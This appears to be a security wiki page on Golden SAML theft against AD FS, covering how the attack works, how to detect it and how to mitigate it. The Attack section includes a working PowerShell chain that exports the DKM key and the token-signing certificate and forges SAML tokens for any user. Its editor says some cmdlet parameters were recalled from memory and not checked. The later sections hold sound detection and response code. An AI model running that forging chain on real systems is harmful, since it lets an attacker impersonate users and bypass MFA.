Golden SAML Theft

Last updated 1 year ago

What Is Golden SAML Theft

An attacker steals the AD FS token-signing certificate and its private key and uses them to forge SAML tokens. A forged token is signed with the genuine key, so every relying party accepts it: the attacker can impersonate any federated user and keeps that access across password resets for as long as the certificate is trusted.

AD FS is an SSO service that links a user's identity across on-prem, cloud and web applications. It performs claims-based authentication and, whenever a relying party asks, issues a signed SAML token carrying the user's claims (identity, group membership, access rights).

ADFS Configuration (AADINTERNALS)

Why Golden SAML?

  • Bypasses MFA: AD FS is never asked to authenticate, so the MFA and access policies enforced there never run, and the forged token can carry whatever authentication-method claims the attacker chooses

  • Persists through password resets: the token is signed with the stolen key, not derived from the user's credential

  • Impersonates any user in the domain without their password

  • AD FS token-signing certificates are valid for one year by default (organizations often raise this to 10 years), so a stolen key stays usable for a long time

  • Difficult to detect: AD FS is not involved in the forged sign-in, and the auditing needed for any visibility is not enabled by default

Attack

Attack flow:

  1. Compromise the AD FS service account (the page's example name is aadcsvc$; the real name is whatever was chosen at installation) OR a Domain Administrator. Either can read the DKM container in AD; the service account can also read the AD FS configuration database on the farm node.

  2. Export

    1. The DKM master key (Distributed Key Manager, stored in AD; this is not DKIM)

    2. The AD FS configuration, which holds the token-signing certificate encrypted with the DKM key; decrypting it yields the private key

  3. Obtain the objectGUID of the user to impersonate (its Base64 form is the ImmutableID that Entra ID matches the token on)

  4. Forge a SAML token signed with the stolen key

  5. Present it to the target resource (M365, a federated web app, etc.); AD FS is never contacted

Find out which account is the AD FS service account from the "Log On As" column of the Active Directory Federation Services (adfssrv) service on a farm node, or enumerate accounts to find it (it carries the HOST/<federation-service-fqdn> SPN).

Recon for ADFS Object

The DKM container lives at CN=ADFS,CN=Microsoft,CN=Program Data,<domain DN>. From the results below, select the entry with that DN ("CN=ADFS, CN=Microsoft, CN=Program Data, etc"); the objects beneath it (a container named by GUID, CN=CryptoPolicy and a contact object whose thumbnailPhoto attribute holds the key) are what the export reads and what a SACL should watch.

#AD Recon: list objects under Program Data and keep the AD FS ones
$base = "CN=Microsoft,CN=Program Data,$((Get-ADDomain -Server DC01).DistinguishedName)"
Get-ADObject -Server DC01 -SearchBase $base -Filter * |
    Where-Object DistinguishedName -like '*CN=ADFS,*'

Export DKM Commands:

Export ADFS Configuration:

Export Token Signing Certificate:

Forge SAML Token:
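The four steps above (DKM export, configuration export, certificate export, token forging) as one added example. This is not the page's original command set; it uses the ActiveDirectory module plus the AADInternals cmdlets the page links to. DC01, the contoso.local domain, the issuer URI and the victim account jdoe are placeholders, Entra ID is assumed to use objectGUID as the source anchor, and the AADInternals parameter names are taken from its documentation as remembered here and should be checked against the installed version (the AAD Graph endpoint the last cmdlet targets has since been retired).

```powershell
# Added example (not the page's own commands): Golden SAML export-and-forge chain.
# Assumptions/placeholders: DC01, contoso.local, the issuer URI, the victim jdoe,
# objectGUID as the Entra ID source anchor, AADInternals installed (Install-Module AADInternals).
Import-Module ActiveDirectory
Import-Module AADInternals

$dc    = 'DC01'
$domDN = (Get-ADDomain -Server $dc).DistinguishedName

# --- 1. DKM master key over LDAP. Works from any domain host as the AD FS service
#        account (the container's ACL grants it read) or a Domain Admin. ---
$dkmBase = "CN=ADFS,CN=Microsoft,CN=Program Data,$domDN"
$dkm = Get-ADObject -Server $dc -SearchBase $dkmBase -Filter * -Properties thumbnailPhoto, displayName
$dkm | Select-Object ObjectClass, DistinguishedName          # GUID container, CryptoPolicy, key contact
$keyObj    = $dkm | Where-Object { $_.thumbnailPhoto }         # only the key object carries the blob
$dkmKeyHex = ($keyObj.thumbnailPhoto | ForEach-Object { $_.ToString('x2') }) -join ''
"DKM master key ({0} bytes): {1}" -f $keyObj.thumbnailPhoto.Length, $dkmKeyHex

# --- 2. Configuration and certificates. This part runs on the AD FS server itself:
#        the configuration is read from the WID over its local named pipe. ---
$config = Export-AADIntADFSConfiguration -Local
$key    = Export-AADIntADFSEncryptionKey -Local -Configuration $config   # same key as step 1, in the form the next cmdlet expects
Export-AADIntADFSCertificates -Configuration $config -Key $key
# -> ADFS_signing.pfx and ADFS_encryption.pfx in the current directory

# --- 3. Victim's ImmutableID: Base64 of the on-prem objectGUID ---
$victim      = Get-ADUser -Server $dc -Identity 'jdoe'
$immutableId = [Convert]::ToBase64String($victim.ObjectGUID.ToByteArray())

# --- 4. Forge a token and exchange it for an access token. AD FS is never contacted,
#        so no 1200/1202/299 audit event exists for this sign-in. ---
$saml = New-AADIntSAMLToken -ImmutableID $immutableId `
                            -PfxFileName '.\ADFS_signing.pfx' `
                            -Issuer 'http://sts.contoso.local/adfs/services/trust'
$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml
```

Step 1 is what the SimuLand "DKM Master Key via LDAP Queries" write-up does by hand and is the read that a SACL on the container turns into a 4662; step 2 is the named-pipe configuration export ADFSDump also performs. Keep the two apart when building detections: one is visible on the domain controller, the other only on the AD FS node.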

HTTP Request (Netwrix)

Mandiant ADFSDUMP

Detect

What logs are available?

  • Event Logs

  • EDR Logs

Event Logs:

  • Enable AD FS auditing and set the audit level to Verbose (Set-AdfsProperties -AuditLevel Verbose)

  • Enable the "Audit Service Ticket Operations" subcategory on the domain controllers

  • Enable the "Audit Application Generated" subcategory on each AD FS node; AD FS writes its audit events through it, so without it the audit level setting produces nothing

  • Enable AD FS trace logging (the AD FS Tracing debug log)

Enable ADFS Logging:
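Enabling that logging on an AD FS 2016 or later node, as an added example that is not part of the original page. The auditpol subcategory and the "AD FS Auditing" Security-log provider are real names; the service account is a placeholder. On 2012 R2 there is no AuditLevel property and only the auditpol step applies.

```powershell
# Added example (not from the page): turn on AD FS security auditing and prove it works.
# Run as a local administrator on every AD FS farm node.
Import-Module ADFS

# 1. Local audit subcategory AD FS writes through. Without it AuditLevel does nothing.
auditpol.exe /set /subcategory:"Application Generated" /success:enable /failure:enable

# 2. Ask AD FS for everything (1200/1202 plus 299/403/500/501 ...). Basic is the default.
Set-AdfsProperties -AuditLevel Verbose

# 3. Confirm both halves.
(Get-AdfsProperties).AuditLevel                        # should read Verbose
auditpol.exe /get /subcategory:"Application Generated"  # should show Success and Failure

# 4. After a test sign-in the events land in Security.evtx under the "AD FS Auditing"
#    provider. An empty result usually means the service account (placeholder
#    CONTOSO\adfssvc$) lacks the "Generate security audits" user right (SeAuditPrivilege)
#    in the node's local security policy; grant it and retest.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ProviderName = 'AD FS Auditing'; Id = 1200, 1202 } -MaxEvents 10 |
    Select-Object TimeCreated, Id, Message
```

Ship the Security log of every farm node to the SIEM; the AD FS audit events are per node, so a node that was not collected leaves a hole in the comparison described under "Normal SAML Creation".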

AD FS Audit Level Event IDs:

Audit levels (Set-AdfsProperties -AuditLevel):

  • None: Set-AdfsProperties -AuditLevel None. Auditing is disabled and no events will be logged.

  • Basic (default): Set-AdfsProperties -AuditLevel Basic. No more than 5 events will be logged for a single request.

  • Verbose: Set-AdfsProperties -AuditLevel Verbose. All events will be logged; this logs a significant amount of information per request.

Events generated when the audit level is set to Basic (Event ID, event type, description):

  • 1202, Fresh Credential Validation Success: a request where fresh credentials were validated successfully by the Federation Service. Covers WS-Trust, WS-Federation, SAML-P (first leg, generating SSO) and the OAuth authorize endpoint.

  • 1203, Fresh Credential Validation Error: a request where fresh credential validation failed on the Federation Service (same endpoints as 1202).

  • 1200, Application Token Success: a security token was issued successfully by the Federation Service. For WS-Federation and SAML-P this is logged when the request is processed with an SSO artifact (such as the SSO cookie).

  • 1201, Application Token Failure: security token issuance failed on the Federation Service (same conditions as 1200).

  • 1204, Password Change Request Success: a password change request was processed successfully by the Federation Service.

  • 1205, Password Change Request Error: a password change request failed to be processed by the Federation Service.

  • 1206, Sign Out Success: a successful sign-out request.

  • 1207, Sign Out Failure: a failed sign-out request.

Additional events generated when the audit level is set to Verbose:

  • 299, Successful Token Issuance: a token was successfully issued for the relying party '%s'. See audit 500 with the same Instance ID for the issued claims, 501 for the caller identity, 502 for the OnBehalfOf identity (if any) and 503 for the ActAs identity (if any).

  • 307, Federation Service Configuration: the Federation Service configuration was changed.

  • 403, AD FS HTTP Requests: an HTTP request was received (client IP, client request ID, user agent, date).

  • 404, AD FS HTTP Requests: an HTTP response was dispatched.

  • 410, AD FS HTTP Requests: the request context headers present on the request.

  • 412, Successful Token Authentication: a token of type '%s' for relying party '%s' was successfully authenticated. See audit 501 with the same Instance ID for the caller identity.

  • 500, Successful Token Issuance: additional context for the issuance, such as the issued claims.

  • 501, Successful Token Authentication: additional context for the authentication, such as the caller identity.

  • 510, Additional Information: additional information for other events, such as configuration changes (307), HTTP requests received (403) and HTTP responses dispatched (404).

Type 3 and 4662:

If the DKM was read over LDAP, a 4662 ("An operation was performed on an object", the same event DCSync is detected with) from the MSOL_ or AD FS service account will be present on the domain controller, with a logon type 3 (network) 4624 for that account from the host that did it. It proves the object was accessed, not that the key was exported, and it only exists if a SACL has been placed on the DKM container; the AD FS service account reads the key legitimately from the farm nodes, so the signal is the same objects being read by another account or from another host.

SACL to Detect DKM Export:
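Placing that SACL and hunting the resulting 4662 events, as an added example that is not part of the original page. It uses the ActiveDirectory module's AD: drive and .NET's ActiveDirectoryAuditRule; DC01 is a placeholder, and the Security-event property indexes used for the 4662 fields are the standard ones for that event.

```powershell
# Added example (not from the page): audit every successful read of the AD FS DKM objects
# as Security event 4662 on the DC, then hunt those events. Run as a Domain Admin with the
# ActiveDirectory module; writing a SACL needs the "Manage auditing and security log" right.
Import-Module ActiveDirectory
$dc    = 'DC01'                                    # placeholder
$domDN = (Get-ADDomain -Server $dc).DistinguishedName
$dkmDN = "CN=ADFS,CN=Microsoft,CN=Program Data,$domDN"

# 1. 4662 is only generated when Directory Service Access auditing is on. Set it on every
#    DC (normally via the Default Domain Controllers Policy); this sets it on one DC.
Invoke-Command -ComputerName $dc -ScriptBlock {
    auditpol.exe /set /subcategory:"Directory Service Access" /success:enable /failure:enable
}

# 2. Audit rule: Everyone, ReadProperty, on success, inherited by every child object
#    (the GUID container, CN=CryptoPolicy and the contact that holds the key).
$everyone = [System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')
$rule = [System.DirectoryServices.ActiveDirectoryAuditRule]::new(
    $everyone,
    [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty,
    [System.Security.AccessControl.AuditFlags]::Success,
    [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All)
$acl = Get-Acl -Path "AD:\$dkmDN" -Audit
$acl.AddAuditRule($rule)
Set-Acl -Path "AD:\$dkmDN" -AclObject $acl

# 3. Hunt. 4662 names the object by DN or by objectGUID, so match on both. The AD FS
#    service account reads the key when the service starts; any other account, another
#    source host (pivot on the 4624 sharing the Logon ID) or an odd hour is the signal.
$dkmObjects = Get-ADObject -Server $dc -SearchBase $dkmDN -Filter *
$pattern = ($dkmObjects | ForEach-Object {
    [regex]::Escape($_.DistinguishedName); [regex]::Escape($_.ObjectGUID.ToString())
}) -join '|'
Get-WinEvent -ComputerName $dc -FilterHashtable @{ LogName = 'Security'; Id = 4662 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match $pattern } |
    Select-Object TimeCreated,
        @{ n = 'Account'; e = { "$($_.Properties[2].Value)\$($_.Properties[1].Value)" } },
        @{ n = 'LogonId'; e = { $_.Properties[3].Value } },
        @{ n = 'Object';  e = { $_.Properties[6].Value } }
```

Baseline the legitimate reads first (each farm node's service account at service start and during certificate rollover), then alert on everything outside that baseline rather than on every 4662, or the rule will be tuned out within a week.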

Normal SAML Creation:

When a user really authenticates through AD FS, the audit events listed above (1202 credential validation, then 1200 and 299 token issuance, with 500/501 context at Verbose) are written to Security.evtx on the AD FS node, provided auditing is enabled; none of it is on by default. A Golden SAML token is built offline and sent straight to the relying party, so AD FS never sees the request and writes nothing for that sign-in. The only record is on the relying party's side: for M365, the Entra ID sign-in log shows a federated sign-in for the impersonated user.

  • Compare the relying party's sign-in records against AD FS issuance events: a federated sign-in with no AD FS token issuance for that user shortly before it is the tell (allow for sign-ins satisfied from an existing Entra refresh token or PRT, which do not round-trip through AD FS either)
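The comparison above as an added example, not part of the original page. The function takes two already-exported data sets and the sample records are constructed: one stands in for an Entra ID sign-in log export filtered to interactive federated sign-ins (tokenIssuerType ADFederationServices), the other for AD FS 1200/1202 events pulled from the farm nodes' Security logs. Field names, the window size and the sample values are assumptions.

```powershell
# Added example (not from the page): flag federated sign-ins that Entra ID accepted but
# AD FS never issued. Inputs are constructed sample data standing in for an Entra sign-in
# export and AD FS audit events 1200/1202; field names and window are assumptions.
function Find-UnmatchedFederatedSignIns {
    param(
        [Parameter(Mandatory)] [object[]] $EntraSignIns,  # UserPrincipalName, CreatedDateTime, AppDisplayName, IPAddress
        [Parameter(Mandatory)] [object[]] $AdfsEvents,    # Id, UserPrincipalName, TimeCreated
        [int] $WindowMinutes = 10                         # how long before the sign-in an AD FS issuance may sit
    )
    $issued = $AdfsEvents | Where-Object { $_.Id -in 1200, 1202 }
    foreach ($s in $EntraSignIns) {
        $match = $issued | Where-Object {
            $_.UserPrincipalName -eq $s.UserPrincipalName -and
            [math]::Abs(($s.CreatedDateTime - $_.TimeCreated).TotalMinutes) -le $WindowMinutes
        }
        if (-not $match) {
            [pscustomobject]@{
                User   = $s.UserPrincipalName
                When   = $s.CreatedDateTime
                App    = $s.AppDisplayName
                IP     = $s.IPAddress
                Reason = "Federated sign-in with no AD FS 1200/1202 within $WindowMinutes min"
            }
        }
    }
}

# Constructed sample data (not real logs).
$signIns = @(
    [pscustomobject]@{ UserPrincipalName = 'alice@contoso.com'; CreatedDateTime = [datetime]'2024-05-01T08:00:00Z'; AppDisplayName = 'Office 365 Exchange Online'; IPAddress = '203.0.113.10' }
    [pscustomobject]@{ UserPrincipalName = 'bob@contoso.com';   CreatedDateTime = [datetime]'2024-05-01T03:12:00Z'; AppDisplayName = 'Microsoft Graph';              IPAddress = '198.51.100.7' }
)
$adfsEvents = @(
    [pscustomobject]@{ Id = 1202; UserPrincipalName = 'alice@contoso.com'; TimeCreated = [datetime]'2024-05-01T07:59:40Z' }
    [pscustomobject]@{ Id = 1200; UserPrincipalName = 'alice@contoso.com'; TimeCreated = [datetime]'2024-05-01T07:59:41Z' }
)

Find-UnmatchedFederatedSignIns -EntraSignIns $signIns -AdfsEvents $adfsEvents | Format-Table -AutoSize
```

With the sample data only bob's 03:12 sign-in is returned: Entra accepted a federated token for him that no AD FS node logged. In production, collect every farm node's Security log before trusting a miss, and treat the result as a triage list rather than an alert, because refresh-token and PRT based sign-ins never touch AD FS either.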

Without Event Logs/EDR:

  • Execution forensics on the AD FS node and domain controllers (Prefetch, Amcache, Shimcache for ADFSDump, AADInternals or PowerShell module loads)

  • Command line logging

  • Evidence of credential dumping or pass-the-hash with the AD FS service account

Mitigate

If this is ever suspected, burn it down with fire: if the AD FS server was ever accessed by an attacker, assume the signing key is gone and issue a new certificate. Revoking tokens on its own does nothing against Golden SAML, because the attacker can forge a fresh token whenever one is needed; only replacing the token-signing certificate, and making every relying party stop trusting the old one, ends the persistence.

  • Treat AD FS (and anything that can read its DKM container or configuration database) as a Tier 0 device

  • If Golden SAML is suspected, issue new token-signing and token-decrypting certificates, update the federation trust in Entra ID and every other relying party so the old certificate is no longer accepted, and remove the old certificate from AD FS rather than leaving it as a secondary signing certificate

  • Ensure all AD FS audit logging is enabled and that a SACL records access to the DKM container

  • Revoke all refresh tokens once the certificate has been replaced, so sessions obtained with forged assertions are cut off

Revoke Refresh Tokens:

#Revoke all existing refresh tokens for every user (forces re-auth). The cmdlet is per user, so loop.
#The AzureAD module is deprecated; the Microsoft Graph equivalent is Revoke-MgUserSignInSession.
Connect-AzureAD
Get-AzureADUser -All $true | ForEach-Object { Revoke-AzureADUserAllRefreshToken -ObjectId $_.ObjectId }

  • Exporting AD FS certificates revisited: Tactics, Techniques and Procedures

  • Detection And Hunting Of Golden SAML Attack

  • Export AD FS DKM Master Key via LDAP Queries (SimuLand)

  • Export AD FS Configuration via a Local Named Pipe (SimuLand)

  • Export AD FS Certificates via DKM Master Key (SimuLand)

  • Forge SAML Tokens (SimuLand)

  • Golden SAML Attack (Netwrix)

  • GitHub: mandiant/ADFSDump

  • Enabling AD FS Security Auditing and Shipping Event Logs to Microsoft Sentinel (techcommunity.microsoft.com)

  • Revoke-AzureADUserAllRefreshToken (AzureAD module), Microsoft Learn